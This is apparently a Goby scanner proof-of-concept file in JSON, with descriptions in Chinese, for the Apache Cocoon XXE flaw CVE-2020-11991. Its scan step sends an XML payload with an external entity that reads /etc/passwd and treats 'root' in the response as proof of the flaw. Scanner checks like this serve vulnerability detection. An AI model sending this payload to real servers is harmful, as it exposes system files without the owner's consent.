Apache Cocoon Xml 注入 CVE-2020-11991.json

{
      "Name": "Apache Cocoon Xml 注入 CVE-2020-11991",
      "Level": "1",
      "Tags": [
            "XML注入"
      ],
      "GobyQuery": "app=\"Apache-Cocoon\"",
      "Description": "9月11日 Apache 软件基金会发布安全公告，修复了 Apache Cocoon xml外部实体注入漏洞（CVE-2020-11991）。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架，在这种框架下的所有处理都被预先定义好的处理组件线性连接起来，能够将输入和产生的输出按照流水线顺序处理。用户群：Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等，Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关，在使用 StreamGenerator 时，代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12",
      "Product": "Apache Cocoon",
      "Homepage": "http://cocoon.apache.org/2.1/",
      "Author": "PeiQi",
      "Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩</span>🐑</p>",
      "Recommandation": "",
      "References": [
            "http://wiki.peiqi.tech"
      ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/v2/api/product/manger/getInfo",
                        "follow_redirect": true,
                        "header": {
                              "Content-type": "text/xml"
                        },
                        "data_type": "text",
                        "data": "<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName> \n<lastName>&ent;</lastName>\n</userInfo>"
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "root",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
      "PostTime": "2021-01-22 22:24:01",
      "GobyVersion": "1.8.237"
}